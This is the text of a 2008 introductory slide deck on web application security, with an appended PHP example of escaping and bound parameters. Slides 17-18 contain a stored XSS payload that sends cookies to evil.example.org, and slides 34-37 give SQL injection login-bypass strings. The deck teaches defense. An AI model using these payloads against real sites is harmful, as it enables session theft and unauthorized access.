Slide 1

Web Application Security 101
Ben Ramsey, Schematic Tech Summit, 26 Sep 2008

Slide 2

What, me worry?

Slide 3

Excuses...

Slide 4

Excuses...
my site is too small
no one will find it
no one would do that
we don't have the time
it's too confusing

Slide 5

Security by Obscurity

Slide 6

Source: http://xkcd.com/257/

Slide 7

Overview
cross-site scripting
cross-site request forgeries
SQL injection
filtering input
escaping output

Slide 8

Filter Input

Slide 9

1. identify input
2. filter the input
3. distinguish between filtered and tainted data

Slide 10

Username:
Select a color: red blue green

Slide 11

Slide 12

Escape Output

Slide 13

1. identify output
2. escape the output
3. distinguish between escaped and unescaped data

Slide 14

<?php
// $html['username'] is the escaped form of the username, kept apart from the raw value
echo "Welcome back, {$html['username']}.";
?>

Slide 15

Cross-site scripting XSS

Slide 16

Exploits user’s trust in a website.

Slide 17

1  Attacker -> forum.example.org

POST /reply.php HTTP/1.1
Host: forum.example.org
Content-Length: 162

threadId=743&message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2Fevil.example.org%2Fsteal.php%3Fcookies%3D%27+%2B+escape%28document.cookie%29%3C%2Fscript%3E

Slide 18

2  forum.example.org -> Victim: the stored reply, containing

<script>
document.location = 'http://evil.example.org/steal.php?cookies=' + escape(document.cookie)
</script>

3  The script runs in the victim's browser.

4  Victim -> evil.example.org

GET /steal.php?cookies=username%3Dramsey%3B PHPSESSID%3D9gd2c7sp50luvorrjdl8dus214 HTTP/1.1
Host: evil.example.org

Slide 19

The vulnerable site outputs tainted, unescaped data.

Slide 20

<?php
echo "$user says:";
echo "$message";
?>

Slide 21

<?php
echo "$user says:";
echo "$message";
?>

(highlighted: $user and $message)

Slide 22

The $user and $message variables are displayed in their raw, unescaped form.

Slide 23

Cross-site request forgeries CSRF

Slide 24

Exploits website’s trust in a user.

Slide 25

1, 2  Victim <-> example.org

3  Victim -> books.example.org

GET /buy.php?isbn=059600656X HTTP/1.1
Host: books.example.org
Cookie: REMEMBER=qhdw5qClx; SESSID=066a8e6fafb1c

Source: Shiflett, Chris. Essential PHP Security. Sebastopol, CA: O'Reilly, 2006.

Slide 26

Which is the vulnerable site? In this case, both.

Slide 27

example.org outputs unescaped user input.
books.example.org trusts that I willingly made the request.

Slide 28

Use POST instead of GET.

"In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered 'safe'. This allows user agents to represent other methods, such as POST, PUT and DELETE, in a special way, so that the user is made aware of the fact that a possibly unsafe action is being requested." – Section 9.1.1, RFC 2616

Slide 29

Don’t focus on convenience.

Slide 30

Force the use of your own forms.

Slide 31

SQL Injection

Slide 32

Source: http://xkcd.com/327/

Slide 33

Slide 34

foo' or 1 = 1 --

Slide 35

SELECT * FROM users WHERE username = 'foo' or 1 = 1 --' AND password = 'a029d0df84eb5549c641e04a9ef389e5'

Slide 36

ramsey' --

Slide 37

SELECT * FROM users WHERE username = 'ramsey' --' AND password = 'a029d0df84eb5549c641e04a9ef389e5'

Slide 38

Always filter input and escape output! When available, use bound parameters for database queries.

Slide 39

Slide 40

<?php
// $dbh is the PDO connection; $clean holds the filtered input.
// The query of slide 35, with bound parameters in place of the quoted values.
$sql = 'SELECT * FROM users WHERE username = :user AND password = :pass';
$sth = $dbh->prepare($sql);
// bindValue() rather than bindParam(): bindParam() binds by reference,
// which md5()'s return value cannot provide.
$sth->bindValue(':user', $clean['username']);
$sth->bindValue(':pass', md5($clean['password']));
$sth->execute();
?>
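As an added example (not code from the slides), the deck's rules applied end to end: the forum post of slides 20-22 with $user and $message escaped, and the login query of slides 35-40 with a bound parameter, run against an in-memory SQLite database through PDO. The table, column and function names are assumed, the pdo_sqlite extension is assumed to be available, and password_hash()/password_verify() stand in for the slides' md5().

```php
<?php
// Added example: the slides' rules end to end. Table, column and function
// names are assumed; password_hash() replaces the slides' md5().

// Filter input: accept a username only if it matches a whitelist pattern.
function filterUsername(string $tainted): ?string
{
    return preg_match('/^[A-Za-z0-9_]{1,32}$/', $tainted) === 1 ? $tainted : null;
}

// Escape output: every tainted value goes through htmlentities() before HTML.
function escapeHtml(string $tainted): string
{
    return htmlentities($tainted, ENT_QUOTES, 'UTF-8');
}

// The forum post of slide 20, rendered from escaped copies kept in $html.
function renderPost(string $user, string $message): string
{
    $html = ['user' => escapeHtml($user), 'message' => escapeHtml($message)];
    return "<p>{$html['user']} says:</p>\n<p>{$html['message']}</p>";
}

// The login lookup of slide 40 with a bound parameter: the username is sent
// as data, so "foo' or 1 = 1 --" is compared literally and matches no row.
function findUser(PDO $db, string $username, string $password): ?string
{
    $sth = $db->prepare('SELECT username, pwhash FROM users WHERE username = :user');
    $sth->bindValue(':user', $username);
    $sth->execute();
    $row = $sth->fetch(PDO::FETCH_ASSOC);
    return ($row && password_verify($password, $row['pwhash'])) ? $row['username'] : null;
}

// Constructed sample database and inputs.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, pwhash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users (username, pwhash) VALUES (:u, :h)');
$ins->execute([':u' => 'ramsey', ':h' => password_hash('correct horse', PASSWORD_DEFAULT)]);

$injection = "foo' or 1 = 1 --";
var_dump(filterUsername($injection));               // rejected by the whitelist filter
var_dump(findUser($db, $injection, 'x'));           // no row: the quote is just a character
var_dump(findUser($db, 'ramsey', 'correct horse')); // the real user still logs in

$script = "<script>document.location = 'http://evil.example.org/steal.php?cookies=' + escape(document.cookie)</script>";
echo renderPost('attacker', $script), "\n";         // the tags arrive as &lt;script&gt; text
```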

Slide 41

Summarize...
Filter Input
Escape Output

Slide 42

Questions?